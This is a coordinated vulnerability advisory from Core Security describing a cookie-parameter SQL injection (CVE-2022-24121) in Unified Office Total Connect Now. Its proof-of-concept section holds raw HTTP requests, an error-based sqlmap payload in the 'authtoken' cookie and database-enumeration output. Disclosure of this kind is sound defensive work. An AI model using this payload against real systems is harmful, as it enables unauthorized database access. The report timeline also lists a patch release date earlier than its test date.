Unified Office Total Connect Now Cookie Parameter SQL Injection

1. Advisory Information 

Title: Unified Office Total Connect Now℠ Cookie Parameter SQL Injection 
Advisory ID: CORE-2022-0001 
Advisory URL:  https://www.coresecurity.com/core-labs/advisories/unified-office-total-connect-sql-injection 
Date published: 2022-02-01 
Date of last update: 2022-02-01  
Vendors contacted: Unified Office 
Release mode: Coordinated release 

2. Vulnerability Information 

Class: CWE-565: Reliance on Cookies without Validation and Integrity Checking [CWE-565
Impact: Code execution 
Remotely Exploitable: Yes 
Locally Exploitable: Yes 
CVE Name:CVE-2022-24121 

3. Vulnerability Description 

Unified Office, Inc.[1] is a technology company located in Nashua, New Hampshire that provides SDN-based hybrid cloud managed Voice-over-IP (VoIP) and Unified Communications services to Small and Medium-sized Businesses (SMBs).

Their solution, Total Connect Now℠, centralizes communications, enabling users to access business voice services such as auto-attendant, voicemail, conferencing, and park/pickup from any device.

A vulnerability was found in Unified Office Total Connect Now that would allow an attacker to extract sensitive information through a Cookie Parameter SQL Injection. 

4. Vulnerable Packages 

  • Unified Office Ttotal Cconnect now running on CentOS (Linux CentOS 6, PHP 5.3.10, Apache 2.2.15, PHP, MySQL >= 5.0.0)   
  • Other products and versions might be affected but have not yet been tested. 

5. Vendor Information, Solutions and Workarounds 

Vendor has implemented input sanitizing which verifies that the injected information is a valid cookie. All affected systems have been patched. 

6. Credits 

This vulnerability was discovered and researched by Michael Clark from the DDI NIRV Team. The publication of this advisory was coordinated by Pablo A. Zurro from the Core Advisories Team. 

7. Technical Description / Proof of Concept Code

NIRV found the vulnerability titled Cookie Parameter SQL Injection (Frontline ID 104772) and determined the “authtoken” parameter was vulnerable. The default cookie parameter is “PHPSESSID” as shown below. 

GET / HTTP/1.1 
Host: 10.1.1.5:2080 
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 
Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate 
Connection: close 
Cookie: PHPSESSID=5df5ces6em5dcnegqknfenknu1 
Upgrade-Insecure-Requests: 1 
Cache-Control: max-age=0   

The “PHPSESSID” parameter can be deleted and “authtoken=deleted;expires=Thu,01-Jan-197000:00:01GMT” parameters can be added, as shown below along with the SQL error message displayed when the “authtoken” parameter is changed to “ ‘ ” . 

GET / HTTP/1.1 
Host: 10.1.1.5:2080 
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 
Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate 
Connection: close 
Cookie: authtoken=';expires=Thu,01-Jan-197000:00:01GMT 
Upgrade-Insecure-Requests: 1 
Cache-Control: max-age=0 
HTTP/1.1 400 Bad Request 
Date: Wed, 01 Sep 2021 21:04:28 GMT 
Server: Apache/2.2.15 (CentOS) 
X-Powered-By: PHP/5.3.10 
Set-Cookie: PHPSESSID=6odo2345h2f6i703s49r432ad3; path=/ 
Expires: Thu, 19 Nov 1981 08:52:00 GMT 
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 
Pragma: no-cache 
Content-Length: 228 
Connection: close 
Content-Type: text/html; charset=UTF-8 

Query /select * from authtokens where token=''' / failed, called from: unknown:

Sqlmap can be used to further exploit the injection.  

sqlmap injection point(s): 

--- 

Parameter: Cookie #1* ((custom) HEADER)  
    Type: error-based  
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)  
    Payload: authtoken=' AND (SELECT 3428 FROM(SELECT 
  COUNT(*),CONCAT(0x716b767871,(SELECT 
  (ELT(3428=3428,1))),0x716b6b6271,FLOOR(RAND(0)*2))x FROM 
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ngCY;expires=Thu,01-Jan-
197000:00:01GMT 

Request sent via sqlmap: 

GET / HTTP/1.1  
Host: 10.1.1.5:2080  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Connection: close  
Cookie: authtoken=*;expires=Thu,01-Jan-197000:00:01GMT  
Upgrade-Insecure-Requests: 1  
Cache-Control: max-age=0  

This host was running the same application on 443 and it was also vulnerable. The request sent via sqlmap below: 

GET / HTTP/1.1  
Host: 10.1.1.5:443  
Cookie: authtoken=*;expires=Thu,01-Jan-197000:00:01GMT  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Upgrade-Insecure-Requests: 1  
Cache-Control: max-age=0  
Te: trailers  
Connection: close  

Databases available: 

[16:05:53] [INFO] the back-end DBMS is MySQL  
web server operating system: Linux CentOS 6  
web application technology: PHP 5.3.10, Apache 2.2.15, PHP  
back-end DBMS: MySQL >= 5.0.0  
[16:05:53] [INFO] fetching database names  
available databases [23]:  
asterisk  
Image
redaction

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

8. Report Timeline 

  • 2021-09-01 Vulnerability is discovered by NIRV. 
  • 2021-10-01 Vulnerability reported to Unified Office. 
  • 2021-12-14 Vulnerability patch tested. 
  • 2021-12-10 Patch released to every customer. 
  • 2022-02-01 Coordinated advisory is released. 

9. References 

[1] https://unifiedoffice.com/total-connect-now/ 

10. About CoreLabs 

CoreLabs, the research center of Core Security, by HelpSystems, is charged with researching and understanding security trends as well as anticipating the future requirements of information security technologies. CoreLabs studies cybersecurity trends, focusing on problem formalization, identification of vulnerabilities, novel solutions, and prototypes for new technologies. The team is comprised of seasoned researchers who regularly discover and discloses vulnerabilities, informing product owners in order to ensure a fix can be released efficiently, and that customers are informed as soon as possible. CoreLabs regularly publishes security advisories, technical papers, project information, and shared software tools for public use at https://www.coresecurity.com/core-labs.   

11. About Core Security 

Core Security, by HelpSystems, provides organizations with critical, actionable insight about who, how, and what is vulnerable in their IT environment. With our layered security approach and robust threat-aware, identity & access, network security, and vulnerability management solutions, security teams can efficiently manage security risks across the enterprise. Learn more at www.coresecurity.com

Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or [email protected].

12. Disclaimer 

The contents of this advisory are copyright (c) 2021 Core Security and (c) 2021 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License:  http://creativecommons.org/licenses/by-nc-sa/3.0/us/